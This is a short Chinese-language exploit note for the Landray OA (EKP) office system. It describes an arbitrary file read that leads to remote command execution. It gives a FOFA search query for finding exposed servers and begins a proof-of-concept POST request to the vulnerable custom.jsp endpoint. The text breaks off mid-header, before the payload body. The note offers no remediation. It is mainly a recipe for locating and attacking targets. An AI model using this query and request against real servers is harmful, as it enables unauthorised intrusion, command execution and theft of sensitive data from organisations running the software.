漏洞描述
深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞,攻击者可利用漏洞获取敏感信息,可构造数据包进行RCE
漏洞影响版本
蓝凌OA
FOFA
app=”Landray-OA系统”
漏洞复现
利用POC执行命令 echo ,实现回显
poc:
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 17605
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIO